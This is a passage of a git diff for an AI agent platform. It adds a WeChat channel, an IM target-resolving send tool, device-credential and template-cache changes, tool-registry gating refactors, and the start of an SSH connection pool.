diff --git a/flocks/tool/channel/channel_message.py b/flocks/tool/channel/channel_message.py
index 30b2ec790..bbe7ba19f 100644
--- a/flocks/tool/channel/channel_message.py
+++ b/flocks/tool/channel/channel_message.py
@@ -22,6 +22,7 @@
 
 _CHANNEL_ALIASES: dict[str, list[str]] = {
     "wecom": ["wecom", "企微", "企业微信", "wechat_work", "wxwork"],
+    "weixin": ["weixin", "微信", "wechat", "wx"],
     "feishu": ["feishu", "飞书", "lark"],
     "dingtalk": ["dingtalk", "钉钉", "dingding", "dingtalk-connector"],
 }
@@ -61,6 +62,8 @@ async def _http_session_send(
     text: str,
     channel_type: str | None = None,
     media_url: str | None = None,
+    account_id: str | None = None,
+    chat_id: str | None = None,
 ) -> ToolResult | None:
     """Send a message via the running flocks server's /api/channel/session-send endpoint,
     reusing the already-established WebSocket connection.
@@ -76,6 +79,10 @@ async def _http_session_send(
             payload["channel_type"] = channel_type
         if media_url:
             payload["media_url"] = media_url
+        if account_id:
+            payload["account_id"] = account_id
+        if chat_id:
+            payload["chat_id"] = chat_id
 
         headers: dict[str, str] = {}
         api_token = _get_api_token()
@@ -122,7 +129,8 @@ async def _http_session_send(
 @ToolRegistry.register_function(
     name="channel_message",
     description=(
-        "Send a message to the IM channel (WeCom / Feishu / DingTalk) bound to a session. "
+        "Send a message to the IM channel bound to a session. "
+        "Channel types: WeCom/企业微信=wecom, Weixin/微信=weixin, Feishu=feishu, DingTalk=dingtalk. "
         "Resolves the target channel and chat automatically from session_id. "
         "Use channel_type to target a specific channel when the session has multiple bindings."
     ),
@@ -144,9 +152,9 @@ async def _http_session_send(
             name="channel_type",
             type=ParameterType.STRING,
             required=False,
-            enum=["wecom", "feishu", "dingtalk", "企微", "飞书", "钉钉"],
+            enum=["wecom", "weixin", "feishu", "dingtalk", "企微", "企业微信", "微信", "飞书", "钉钉"],
             description=(
-                "Target channel: wecom, feishu, or dingtalk. "
+                "Target channel: wecom=企业微信, weixin=微信, feishu=飞书, or dingtalk=钉钉. "
                 "Chinese aliases are accepted. "
                 "If omitted and the session has only one binding, that channel is used automatically. "
                 "If omitted and the session has multiple bindings, the message is sent to all of them."
@@ -158,12 +166,26 @@ async def _http_session_send(
             required=False,
             description="Media URL or local file path (optional).",
         ),
+        ToolParameter(
+            name="account_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional exact binding filter. Usually supplied by im_send_message after target resolution.",
+        ),
+        ToolParameter(
+            name="chat_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional exact binding filter. Usually supplied by im_send_message after target resolution.",
+        ),
     ],
 )
 async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     session_id: str = kwargs["session_id"]
     message: str = kwargs["message"]
     media: str | None = kwargs.get("media")
+    account_id: str | None = kwargs.get("account_id")
+    chat_id: str | None = kwargs.get("chat_id")
     raw_channel_type: str | None = kwargs.get("channel_type")
     channel_type: str | None = _normalize_channel_type(raw_channel_type)
 
@@ -175,7 +197,15 @@ async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     except Exception:
         port = 8000
 
-    result = await _http_session_send(port, session_id, message, channel_type, media)
+    result = await _http_session_send(
+        port,
+        session_id,
+        message,
+        channel_type,
+        media,
+        account_id,
+        chat_id,
+    )
     if result is not None:
         return result
 
@@ -212,6 +242,19 @@ async def channel_message(ctx: ToolContext, **kwargs) -> ToolResult:
     else:
         targets = matched
 
+    if account_id:
+        targets = [b for b in targets if b.account_id == account_id]
+    if chat_id:
+        targets = [b for b in targets if b.chat_id == chat_id]
+    if (account_id or chat_id) and not targets:
+        return ToolResult(
+            success=False,
+            error=(
+                f"Session '{session_id}' has no binding matching "
+                f"account_id='{account_id}' chat_id='{chat_id}'."
+            ),
+        )
+
     all_results = []
     errors = []
 
diff --git a/flocks/tool/channel/im_send_message.py b/flocks/tool/channel/im_send_message.py
new file mode 100644
index 000000000..68fbc1078
--- /dev/null
+++ b/flocks/tool/channel/im_send_message.py
@@ -0,0 +1,285 @@
+"""High-level IM sending helper built on top of channel_message."""
+
+from __future__ import annotations
+
+from dataclasses import dataclass
+from typing import Any
+
+from flocks.tool.registry import (
+    ParameterType,
+    ToolCategory,
+    ToolContext,
+    ToolParameter,
+    ToolRegistry,
+    ToolResult,
+)
+
+
+_CHANNEL_ALIASES: dict[str, list[str]] = {
+    "wecom": ["wecom", "企微", "企业微信", "wechat_work", "wxwork"],
+    "weixin": ["weixin", "微信", "wechat", "wx"],
+    "feishu": ["feishu", "飞书", "lark"],
+    "dingtalk": ["dingtalk", "钉钉", "dingding", "dingtalk-connector"],
+}
+
+
+@dataclass(frozen=True)
+class _Candidate:
+    session_id: str
+    channel_id: str
+    account_id: str
+    chat_type: str
+    chat_id: str
+    title: str
+    last_message_at: float
+
+    @property
+    def label(self) -> str:
+        return f"{self.title} [{self.channel_id}] ({self.session_id})"
+
+    @property
+    def description(self) -> str:
+        return f"session_id={self.session_id} chat_type={self.chat_type} chat_id={self.chat_id}"
+
+
+def _normalize_channel_type(channel_type: str | None) -> str | None:
+    if not channel_type:
+        return None
+    lower = channel_type.strip().lower()
+    for canonical, aliases in _CHANNEL_ALIASES.items():
+        if lower in [alias.lower() for alias in aliases]:
+            return canonical
+    return lower
+
+
+def _matches_target(candidate: _Candidate, target: str | None) -> bool:
+    if not target:
+        return True
+    needle = target.strip().lower()
+    if not needle:
+        return True
+    return (
+        needle in candidate.session_id.lower()
+        or needle in candidate.channel_id.lower()
+        or needle in candidate.title.lower()
+        or needle in candidate.chat_id.lower()
+    )
+
+
+async def _list_candidates(channel_type: str | None = None, target: str | None = None) -> list[_Candidate]:
+    from flocks.channel.inbound.session_binding import SessionBindingService
+    from flocks.session.session import Session
+
+    svc = SessionBindingService()
+    bindings = await svc.list_bindings(channel_id=channel_type)
+    candidates: list[_Candidate] = []
+
+    for binding in bindings:
+        session = await Session.get_by_id(binding.session_id)
+        if not session or session.status != "active" or session.category != "user":
+            continue
+        candidate = _Candidate(
+            session_id=binding.session_id,
+            channel_id=binding.channel_id,
+            account_id=binding.account_id,
+            chat_type=binding.chat_type.value if binding.chat_type else "unknown",
+            chat_id=binding.chat_id,
+            title=session.title,
+            last_message_at=binding.last_message_at,
+        )
+        if _matches_target(candidate, target):
+            candidates.append(candidate)
+
+    return sorted(candidates, key=lambda c: c.last_message_at, reverse=True)
+
+
+async def _current_session_candidates(ctx: ToolContext, channel_type: str | None) -> list[_Candidate]:
+    if not ctx.session_id:
+        return []
+    candidates = await _list_candidates(channel_type=channel_type, target=ctx.session_id)
+    return [candidate for candidate in candidates if candidate.session_id == ctx.session_id]
+
+
+async def _ask_user_to_choose(ctx: ToolContext, candidates: list[_Candidate]) -> ToolResult:
+    from flocks.tool.system.question import question_tool
+
+    options = [
+        {"label": candidate.label, "description": candidate.description}
+        for candidate in candidates
+    ]
+    options.append({
+        "label": "I don't know",
+        "description": "Stop and ask me to provide a session ID.",
+    })
+
+    return await question_tool(
+        ctx,
+        questions=[
+            {
+                "question": "Which IM session should receive this message?",
+                "type": "choice",
+                "options": options,
+            }
+        ],
+    )
+
+
+def _selected_candidate(question_result: ToolResult, candidates: list[_Candidate]) -> _Candidate | None:
+    answers: Any = (question_result.metadata or {}).get("answers")
+    if not answers or not answers[0]:
+        return None
+
+    selected_label = str(answers[0][0])
+    for candidate in candidates:
+        if candidate.label == selected_label:
+            return candidate
+    return None
+
+
+def _resolution_output(candidate: _Candidate) -> str:
+    return (
+        f"Resolved IM target: session_id={candidate.session_id} "
+        f"channel_type={candidate.channel_id} chat_type={candidate.chat_type}"
+    )
+
+
+async def _resolve_target(
+    ctx: ToolContext,
+    session_id: str | None,
+    channel_type: str | None,
+    target: str | None,
+) -> ToolResult:
+    if session_id:
+        candidates = await _list_candidates(channel_type=channel_type, target=session_id)
+        exact = [candidate for candidate in candidates if candidate.session_id == session_id]
+        if exact:
+            return ToolResult(success=True, output=_resolution_output(exact[0]), metadata={"target": exact[0].__dict__})
+        return ToolResult(
+            success=False,
+            error=f"No active IM binding found for session_id='{session_id}'.",
+        )
+
+    current_candidates = await _current_session_candidates(ctx, channel_type)
+    if len(current_candidates) == 1 and not target:
+        candidate = current_candidates[0]
+        return ToolResult(success=True, output=_resolution_output(candidate), metadata={"target": candidate.__dict__})
+
+    candidates = await _list_candidates(channel_type=channel_type, target=target)
+    if not candidates:
+        filter_text = f" matching '{target}'" if target else ""
+        channel_text = f" for channel_type='{channel_type}'" if channel_type else ""
+        return ToolResult(
+            success=False,
+            error=(
+                f"No active IM sessions found{channel_text}{filter_text}. "
+                "Ask the user to send a message to the Flocks bot from the target IM chat first, "
+                "or provide an exact session_id."
+            ),
+        )
+
+    if len(candidates) == 1:
+        candidate = candidates[0]
+        return ToolResult(success=True, output=_resolution_output(candidate), metadata={"target": candidate.__dict__})
+
+    question_result = await _ask_user_to_choose(ctx, candidates)
+    if not question_result.success:
+        return question_result
+    if (question_result.metadata or {}).get("deferred"):
+        return question_result
+
+    selected = _selected_candidate(question_result, candidates)
+    if selected is None:
+        return ToolResult(
+            success=False,
+            error="No IM session selected. Ask the user for the exact session_id before sending.",
+        )
+
+    return ToolResult(success=True, output=_resolution_output(selected), metadata={"target": selected.__dict__})
+
+
+@ToolRegistry.register_function(
+    name="im_send_message",
+    description=(
+        "Resolve an IM target session and optionally send a message. "
+        "Use this for WeCom/企业微信, Weixin/微信, Feishu, DingTalk, or custom channel sessions when the user asks to send an IM message. "
+        "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
+        "If session_id is omitted, it uses the current IM session when available, otherwise asks the user to pick one."
+    ),
+    category=ToolCategory.SYSTEM,
+    parameters=[
+        ToolParameter(
+            name="message",
+            type=ParameterType.STRING,
+            required=False,
+            description="Message content to send. Required unless resolve_only=true.",
+        ),
+        ToolParameter(
+            name="session_id",
+            type=ParameterType.STRING,
+            required=False,
+            description="Exact Flocks session ID for the target IM chat, if already known.",
+        ),
+        ToolParameter(
+            name="channel_type",
+            type=ParameterType.STRING,
+            required=False,
+            description=(
+                "Optional channel filter, such as wecom=企业微信, weixin=微信, "
+                "feishu, dingtalk, telegram, or a custom channel id."
+            ),
+        ),
+        ToolParameter(
+            name="target",
+            type=ParameterType.STRING,
+            required=False,
+            description="Optional target hint: platform name, session title, session ID fragment, or chat ID fragment.",
+        ),
+        ToolParameter(
+            name="media",
+            type=ParameterType.STRING,
+            required=False,
+            description="Media URL or local file path (optional).",
+        ),
+        ToolParameter(
+            name="resolve_only",
+            type=ParameterType.BOOLEAN,
+            required=False,
+            default=False,
+            description="Resolve and return session_id/channel_type without sending. Use before schedule_task_create.",
+        ),
+    ],
+)
+async def im_send_message(ctx: ToolContext, **kwargs) -> ToolResult:
+    message: str | None = kwargs.get("message")
+    session_id: str | None = kwargs.get("session_id")
+    target: str | None = kwargs.get("target")
+    media: str | None = kwargs.get("media")
+    resolve_only: bool = bool(kwargs.get("resolve_only", False))
+    channel_type = _normalize_channel_type(kwargs.get("channel_type"))
+
+    if not resolve_only and not message:
+        return ToolResult(success=False, error="message is required unless resolve_only=true.")
+
+    resolved = await _resolve_target(ctx, session_id, channel_type, target)
+    if not resolved.success or resolve_only or (resolved.metadata or {}).get("deferred"):
+        return resolved
+
+    resolved_target = (resolved.metadata or {}).get("target") or {}
+    resolved_session_id = resolved_target.get("session_id")
+    resolved_channel_type = resolved_target.get("channel_id")
+    resolved_account_id = resolved_target.get("account_id")
+    resolved_chat_id = resolved_target.get("chat_id")
+    if not resolved_session_id:
+        return ToolResult(success=False, error="Failed to resolve an IM session_id.")
+
+    from flocks.tool.channel.channel_message import channel_message
+
+    return await channel_message(
+        ctx,
+        session_id=resolved_session_id,
+        message=message,
+        channel_type=resolved_channel_type,
+        account_id=resolved_account_id,
+        chat_id=resolved_chat_id,
+        media=media,
+    )
diff --git a/flocks/tool/credential_context.py b/flocks/tool/credential_context.py
index 9cac8a8f1..d4b0dfe1e 100644
--- a/flocks/tool/credential_context.py
+++ b/flocks/tool/credential_context.py
@@ -200,11 +200,13 @@ async def _build_overrides(device_id: str) -> _DeviceOverrides:
     config_ovr: Dict[str, Any] = {}
 
     if credential_fields:
+        mapped_field_keys: set[str] = set()
         for field in credential_fields:
             fkey = field.get("key", "")
             value = resolved_fields.get(fkey)
             if value is None:
                 continue
+            mapped_field_keys.add(fkey)
             storage = field.get("storage", "secret")
             if storage == "secret":
                 sid = field.get("secret_id") or fkey
@@ -223,6 +225,12 @@ async def _build_overrides(device_id: str) -> _DeviceOverrides:
                 config_ovr[ckey] = value
                 if ckey != fkey:
                     config_ovr[fkey] = value
+        # Preserve legacy device-scoped fields that are no longer listed in
+        # the current provider schema. This keeps old devices working after a
+        # schema split such as NGTIP's apiKey -> queryApiKey/platformApiKey.
+        for key, value in resolved_fields.items():
+            if key not in mapped_field_keys and key not in config_ovr:
+                config_ovr[key] = value
     else:
         # Fallback: no credential_fields metadata – use field values as-is
         for k, v in resolved_fields.items():
diff --git a/flocks/tool/device/intake.py b/flocks/tool/device/intake.py
index 1acbc34a5..b4589afc0 100644
--- a/flocks/tool/device/intake.py
+++ b/flocks/tool/device/intake.py
@@ -23,7 +23,12 @@
     DeviceTestRequest,
     DeviceTestResult,
 )
-from flocks.tool.device.secrets import delete_secrets, persist_fields, resolve_for_runtime
+from flocks.tool.device.secrets import (
+    delete_secrets,
+    mask_for_display,
+    persist_fields,
+    resolve_for_runtime,
+)
 from flocks.tool.device.store import (
     delete_device_row,
     ensure_default_group,
@@ -261,7 +266,7 @@ async def test_device(
         raise DeviceNotFoundError("Device not found")
 
     db_fields: dict = json.loads(row["fields"] or "{}")
-    resolved = resolve_for_runtime(db_fields)
+    resolved = _resolve_test_fields(db_fields, body)
     persisted_base_url = (resolved.get("base_url") or "").strip()
 
     override_base_url = (body.base_url.strip() if body and body.base_url else "")
@@ -295,6 +300,29 @@ async def test_device(
     return result
 
 
+def _resolve_test_fields(
+    db_fields: dict,
+    body: Optional[DeviceTestRequest],
+) -> dict[str, str]:
+    """Resolve persisted fields and apply unsaved form values for one probe."""
+    resolved = resolve_for_runtime(db_fields)
+    draft_fields = body.fields if body and body.fields else None
+    if not draft_fields:
+        return resolved
+
+    display_fields, _ = mask_for_display(db_fields)
+    merged = dict(resolved)
+    for key, value in draft_fields.items():
+        draft_value = value if isinstance(value, str) else ""
+        persisted_value = resolved.get(key, "")
+        display_value = display_fields.get(key, "")
+        is_masked_secret = bool(persisted_value) and display_value != persisted_value
+        if is_masked_secret and draft_value in {"", display_value}:
+            continue
+        merged[key] = draft_value
+    return merged
+
+
 async def _probe(base_url: str, *, verify_ssl: bool) -> DeviceTestResult:
     start = time.monotonic()
 
diff --git a/flocks/tool/device/models.py b/flocks/tool/device/models.py
index 0072653ce..6c16d9074 100644
--- a/flocks/tool/device/models.py
+++ b/flocks/tool/device/models.py
@@ -164,6 +164,10 @@ class DeviceTestResult(BaseModel):
 class DeviceTestRequest(BaseModel):
     """Optional body for ``POST /devices/{id}/test``."""
 
+    fields: Optional[Dict[str, str]] = Field(
+        None,
+        description="Unsaved form fields to use for this probe only",
+    )
     base_url: Optional[str] = Field(
         None,
         description="Override the persisted base_url for this probe only",
diff --git a/flocks/tool/device/plugin_index.py b/flocks/tool/device/plugin_index.py
index 202805def..d138de485 100644
--- a/flocks/tool/device/plugin_index.py
+++ b/flocks/tool/device/plugin_index.py
@@ -29,14 +29,26 @@
 
 _SAFE_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]*$")
 _SAFE_SERVICE_ID = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
+_template_cache: Optional[list[DeviceTemplate]] = None
+
+
+def clear_device_template_cache() -> None:
+    """Clear the in-process device template cache after plugin changes."""
+    global _template_cache
+    _template_cache = None
 
 
 def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
     """Return device templates from Hub catalog plus local descriptor discovery."""
+    global _template_cache
+    if _template_cache is not None and not refresh:
+        return list(_template_cache)
+
     if refresh:
         _refresh_device_plugin_runtime()
 
     by_key: dict[str, DeviceTemplate] = {}
+    tool_counts = _device_tool_counts()
     for entry in hub_catalog.list_catalog(plugin_type="device"):
         root = _catalog_entry_root(entry)
         if root is None:
@@ -66,6 +78,7 @@ def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
             fallback_description=entry.description,
             fallback_description_cn=entry.descriptionCn,
             fallback_version=entry.installedVersion or entry.version,
+            tool_counts=tool_counts,
         )
         if template is not None:
             by_key[template.storage_key] = template
@@ -89,9 +102,12 @@ def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
             state="localOnly",
             installed=True,
             source=source,
+            tool_counts=tool_counts,
         )
 
-    return sorted(by_key.values(), key=_sort_key)
+    templates = sorted(by_key.values(), key=_sort_key)
+    _template_cache = templates
+    return list(templates)
 
 
 def create_custom_device_template(body: CustomDeviceTemplateCreate) -> DeviceTemplate:
@@ -145,6 +161,7 @@ def create_custom_device_template(body: CustomDeviceTemplateCreate) -> DeviceTem
 
 def _refresh_device_plugin_runtime() -> None:
     """Refresh both device descriptors and runtime tool registrations."""
+    clear_device_template_cache()
     discover_api_service_descriptors(refresh=True)
     try:
         ToolRegistry.refresh_plugin_tools()
@@ -163,6 +180,7 @@ def _template_from_plugin_root(
     fallback_description: Optional[str] = None,
     fallback_description_cn: Optional[str] = None,
     fallback_version: Optional[str] = None,
+    tool_counts: Optional[dict[str, int]] = None,
 ) -> Optional[DeviceTemplate]:
     provider = _read_provider_yaml(root)
     if _integration_type(provider) != "device":
@@ -187,6 +205,7 @@ def _template_from_plugin_root(
         fallback_name=fallback_name,
         fallback_description=fallback_description,
         fallback_description_cn=fallback_description_cn,
+        tool_counts=tool_counts,
     )
 
 
@@ -201,6 +220,7 @@ def _template_from_descriptor(
     fallback_name: Optional[str] = None,
     fallback_description: Optional[str] = None,
     fallback_description_cn: Optional[str] = None,
+    tool_counts: Optional[dict[str, int]] = None,
 ) -> DeviceTemplate:
     name = _template_name(provider, descriptor, fallback_name, plugin_id)
     description = _optional_str(provider.get("description")) or fallback_description
@@ -218,7 +238,7 @@ def _template_from_descriptor(
             field.model_dump(mode="json")
             for field in _build_api_service_credential_schema(descriptor.storage_key, provider)
         ],
-        tool_count=_tool_count(descriptor.storage_key, descriptor.provider_yaml.parent),
+        tool_count=_tool_count(descriptor.storage_key, descriptor.provider_yaml.parent, tool_counts),
         installed=installed,
         state=state,  # type: ignore[arg-type]
         source=source,  # type: ignore[arg-type]
@@ -303,17 +323,29 @@ def _source_from_path(path: Optional[Path]) -> str:
     return "bundled"
 
 
-def _tool_count(storage_key: str, root: Path) -> int:
+def _device_tool_counts() -> Optional[dict[str, int]]:
     try:
         ToolRegistry.init()
-        count = len([
-            tool for tool in ToolRegistry.list_tools()
-            if tool.source == "device" and tool.provider == storage_key
-        ])
-        if count:
-            return count
     except Exception as exc:
         log.debug("device.templates.tool_registry_unavailable", {"error": str(exc)})
+        return None
+
+    counts: dict[str, int] = {}
+    for tool in ToolRegistry.list_tools():
+        if tool.source != "device" or not tool.provider:
+            continue
+        counts[tool.provider] = counts.get(tool.provider, 0) + 1
+    return counts
+
+
+def _tool_count(
+    storage_key: str,
+    root: Path,
+    tool_counts: Optional[dict[str, int]] = None,
+) -> int:
+    count = tool_counts.get(storage_key, 0) if tool_counts is not None else 0
+    if count:
+        return count
 
     return len([
         path for path in _tool_yaml_files(root)
diff --git a/flocks/tool/file/glob.py b/flocks/tool/file/glob.py
index b0c5ab760..c9f5eb8a0 100644
--- a/flocks/tool/file/glob.py
+++ b/flocks/tool/file/glob.py
@@ -32,7 +32,7 @@
 - Returns matching file paths sorted by modification time
 - Use this tool when you need to find files by name patterns
 - When you are doing an open-ended search that may require multiple rounds of globbing and grepping, prefer delegating that exploration or use a more specialized search workflow
-- You have the capability to call multiple tools in a single response. It is always better to speculatively perform multiple searches as a batch that are potentially useful."""
+- You may call multiple independent tools in the same response. Prefer separate parallel Glob calls when multiple searches are likely to be useful."""
 
 
 def find_ripgrep() -> Optional[str]:
diff --git a/flocks/tool/file/read.py b/flocks/tool/file/read.py
index 9481c5646..cd2ed8683 100644
--- a/flocks/tool/file/read.py
+++ b/flocks/tool/file/read.py
@@ -61,7 +61,7 @@
 - For files longer than 2000 lines, you MUST use offset and limit to read in segments (e.g. offset=0 limit=2000, then offset=2000 limit=2000, etc.)
 - Any lines longer than 2000 characters will be truncated
 - Text results are returned with a 5-digit, zero-padded 1-based line number prefix in the form `00001| `
-- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.
 - If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.
 - You can read image files using this tool."""
 
diff --git a/flocks/tool/question_handler.py b/flocks/tool/question_handler.py
index 4cc3e94f8..21ee7a89c 100644
--- a/flocks/tool/question_handler.py
+++ b/flocks/tool/question_handler.py
@@ -15,7 +15,12 @@
     is_request_rejected,
     clear_request_state,
 )
-from flocks.tool.system.question import QuestionRejectedError, get_current_message_id, get_current_call_id
+from flocks.tool.system.question import (
+    QuestionRejectedError,
+    get_current_call_id,
+    get_current_message_id,
+    normalize_question_option,
+)
 
 
 log = Log.create(service="question-handler")
@@ -68,22 +73,18 @@ async def api_question_handler(
         # Convert options format for QuestionInfo
         options = []
         for opt in q.get("options", []):
-            if isinstance(opt, dict):
-                options.append({
-                    "label": str(opt.get("label", "")),
-                    "description": str(opt.get("description", "")),
-                })
-            elif isinstance(opt, str):
-                options.append({
-                    "label": opt,
-                    "description": "",
-                })
+            option = normalize_question_option(opt)
+            if option is not None:
+                options.append(option)
         
         # Build QuestionInfo
+        question_type = q.get("type", "choice")
+        if question_type == "choice" and not options:
+            question_type = "text"
         question_info = {
             "question": str(q.get("question", "")),
             "header": str(q.get("header", "")),
-            "type": q.get("type", "choice"),
+            "type": question_type,
             "options": options,
             "multiple": q.get("multiple", False),
             "placeholder": q.get("placeholder", ""),
diff --git a/flocks/tool/registry.py b/flocks/tool/registry.py
index 229361ac8..f76c1fa53 100644
--- a/flocks/tool/registry.py
+++ b/flocks/tool/registry.py
@@ -680,7 +680,7 @@ def register_function(
         category: ToolCategory = ToolCategory.CUSTOM,
         parameters: Optional[List[ToolParameter]] = None,
         requires_confirmation: bool = False,
-        native: bool = False,
+        native: Optional[bool] = None,
         always_load: Optional[bool] = None,
         tags: Optional[List[str]] = None,
         enabled: bool = True,
@@ -688,11 +688,11 @@ def register_function(
         """
         Decorator to register a function as a tool.
 
-        ``native`` defaults to False (safe default).  Built-in tools get
-        ``native=True`` in bulk by ``_register_builtin_tools()`` after all
-        built-in modules are imported, so callers don't need to pass it
-        explicitly.  User plugin Python files that use this decorator will
-        correctly stay ``native=False``.
+        ``native=None`` means the loading context decides. Built-in tools get
+        ``native=True`` in bulk by ``_register_builtin_tools()`` only when the
+        decorator did not explicitly pass ``native``. User plugin Python files
+        that use this decorator still default to ``native=False`` unless their
+        loading path marks them project-level.
 
         Usage:
             @ToolRegistry.register_function(
@@ -704,18 +704,20 @@ async def read_tool(ctx: ToolContext, filePath: str) -> ToolResult:
                 ...
         """
         def decorator(func: ToolHandler) -> ToolHandler:
-            info = ToolInfo(
-                name=name,
-                description=description,
-                description_cn=description_cn,
-                category=category,
-                parameters=parameters or [],
-                requires_confirmation=requires_confirmation,
-                native=native,
-                always_load=always_load,
-                tags=list(tags or []),
-                enabled=enabled,
-            )
+            info_kwargs: Dict[str, Any] = {
+                "name": name,
+                "description": description,
+                "description_cn": description_cn,
+                "category": category,
+                "parameters": parameters or [],
+                "requires_confirmation": requires_confirmation,
+                "always_load": always_load,
+                "tags": list(tags or []),
+                "enabled": enabled,
+            }
+            if native is not None:
+                info_kwargs["native"] = native
+            info = ToolInfo(**info_kwargs)
             tool = Tool(info=info, handler=func)
             cls.register(tool)
             return func
@@ -775,12 +777,6 @@ async def execute(
                 error=f"Tool not found: {tool_name}"
             )
 
-        if not tool.info.enabled:
-            return ToolResult(
-                success=False,
-                error=f"Tool is disabled: {tool_name}"
-            )
-
         # Create default context if not provided
         if ctx is None:
             ctx = ToolContext(
@@ -794,6 +790,7 @@ async def execute(
         })
 
         device_id = kwargs.pop("device_id", None)
+        per_device_enabled = None
 
         if tool.info.source == "device" and tool.info.provider:
             try:
@@ -814,13 +811,23 @@ async def execute(
             if resolution_error:
                 return ToolResult(success=False, error=resolution_error)
             device_id = resolved_device_id
+        elif not tool.info.enabled:
+            return ToolResult(
+                success=False,
+                error=f"Tool is disabled: {tool_name}"
+            )
+
+        if not tool.info.enabled:
+            return ToolResult(
+                success=False,
+                error=f"Tool is disabled: {tool_name}"
+            )
 
         if device_id:
-            # Per-device tool enable gate: an individual device instance may
-            # have its own enabled=False override independent of the shared
-            # global tool_settings.  This prevents toggling a tool "for
-            # Device A" from affecting Device B when both share the same
-            # storage_key (same plugin version, different names).
+            # Per-device tool enable gate: a device instance may carry a
+            # disabled override independent of the shared global tool state.
+            # A stored enabled=True row is legacy data and is treated the same
+            # as no override; it must not bypass the global disabled state.
             try:
                 from flocks.tool.device.store import get_device_tool_enabled
                 per_device_enabled = await get_device_tool_enabled(device_id, tool_name)
@@ -837,6 +844,7 @@ async def execute(
                     "tool": tool_name, "device_id": device_id, "error": str(_gate_err),
                 })
 
+        if device_id:
             from flocks.tool.credential_context import activate_device_credentials
             async with activate_device_credentials(device_id) as activated:
                 if not activated:
@@ -1018,9 +1026,8 @@ def init(cls) -> None:
     def _load_plugin_tools(cls) -> None:
         """Load plugin tools from both user-level and project-level plugin dirs on init.
 
-        Without this, YAML/Python plugin tools only appear after
-        ``PluginLoader.load_all()`` is triggered by Agent initialization
-        or an explicit ``POST /api/tools/refresh``.
+        Without this, YAML/Python plugin tools only appear after an explicit
+        ``POST /api/tools/refresh`` or a tool registry initialization pass.
 
         Scans both:
         - ``~/.flocks/plugins/tools/`` (user-level)
@@ -1033,7 +1040,8 @@ def _load_plugin_tools(cls) -> None:
         before = set(cls._tools.keys())
         try:
             from flocks.plugin import PluginLoader
-            PluginLoader.load_all()
+
+            PluginLoader.load_extension("TOOLS", load_entry_points=True)
         except Exception as e:
             log.warn("tool_registry.plugin_load_failed", {"error": str(e)})
         after = set(cls._tools.keys())
@@ -1457,7 +1465,7 @@ def _register_builtin_tools(cls) -> None:
             # device/ — security device asset context
             ("flocks.tool.device", ["device_context_tool"]),
             # channel/ — IM platform messaging
-            ("flocks.tool.channel", ["channel_message"]),
+            ("flocks.tool.channel", ["channel_message", "im_send_message"]),
             # wecom/ — 企业微信 MCP（文档、智能表格）
             ("flocks.tool.wecom", ["wecom_mcp"]),
         ]
@@ -1468,23 +1476,18 @@ def _register_builtin_tools(cls) -> None:
                 except ImportError as e:
                     log.warn("builtin_tools.import_failed", {"module": f"{package}.{mod_name}", "error": str(e)})
 
-        # Mark every tool registered during this call as native=True, except
-        # for built-in modules that should remain non-native by policy.
-        # This is done in bulk here so individual @register_function call
-        # sites don't need to pass native=True, and user plugin files using
-        # the same decorator won't be misclassified.
-        builtin_native_exceptions = {
-            "lsp",
-            "task",
-            "list_providers",
-            "add_provider",
-            "add_model",
-        }
+        # Mark built-in tools native=True only when the decorator did not
+        # explicitly declare native. This keeps the default convenient for
+        # built-ins while preserving native=False for management tools that
+        # should be discovered through tool_search.
         for name in set(cls._tools.keys()) - before:
-            if name in builtin_native_exceptions:
-                cls._tools[name].info.native = False
+            tool = cls._tools[name]
+            fields_set = getattr(tool.info, "model_fields_set", None)
+            if fields_set is None:
+                fields_set = getattr(tool.info, "__fields_set__", set())
+            if "native" in fields_set:
                 continue
-            cls._tools[name].info.native = True
+            tool.info.native = True
 
         # Sample tools for testing (only register if not already registered)
         if "get_time" not in cls._tools:
@@ -1568,8 +1571,17 @@ def _reset_failure_state(cls, tool_name: str) -> None:
 
     @classmethod
     def _should_track_failure(cls, tool: Tool) -> bool:
-        """Track failures only for custom tools to avoid disabling core tools."""
-        return tool.info.category == ToolCategory.CUSTOM and tool.info.name != "invalid"
+        """Track failures only for standalone custom tools.
+
+        Device-backed tools have per-device switches; repeated upstream/API
+        failures should not mutate the shared in-memory switch for every
+        device instance.
+        """
+        return (
+            tool.info.category == ToolCategory.CUSTOM
+            and tool.info.name != "invalid"
+            and tool.info.source != "device"
+        )
 
     @classmethod
     def _is_countable_error(cls, error: Optional[str]) -> bool:
diff --git a/flocks/tool/security/ssh_utils.py b/flocks/tool/security/ssh_utils.py
index 9429a4d75..5ea1580c9 100644
--- a/flocks/tool/security/ssh_utils.py
+++ b/flocks/tool/security/ssh_utils.py
@@ -7,6 +7,10 @@
 """
 
 import asyncio
+import os
+import time
+from collections import OrderedDict
+from dataclasses import dataclass
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Optional
@@ -54,16 +58,76 @@ def audit_log(
 # Session-level SSH connection pool
 # ---------------------------------------------------------------------------
 
+
+DEFAULT_POOL_MAX_CONNECTIONS = 128
+DEFAULT_POOL_IDLE_TTL_S = 120.0
+
+
+def _env_int(name: str, default: int, minimum: int) -> int:
+    raw = os.getenv(name)
+    if not raw:
+        return default
+    try:
+        return max(minimum, int(raw))
+    except ValueError:
+        log.warn("ssh_pool.invalid_int_env", {"name": name, "value": raw})
+        return default
+
+
+def _env_float(name: str, default: float, minimum: float) -> float:
+    raw = os.getenv(name)
+    if not raw:
+        return default
+    try:
+        return max(minimum, float(raw))
+    except ValueError:
+        log.warn("ssh_pool.invalid_float_env", {"name": name, "value": raw})
+        return default
+
+
+@dataclass
+class _PoolEntry:
+    conn: asyncssh.SSHClientConnection
+    last_used: float
+    in_use: int = 0
+
+
 class SSHConnectionPool:
     """Per-session SSH connection cache.
 
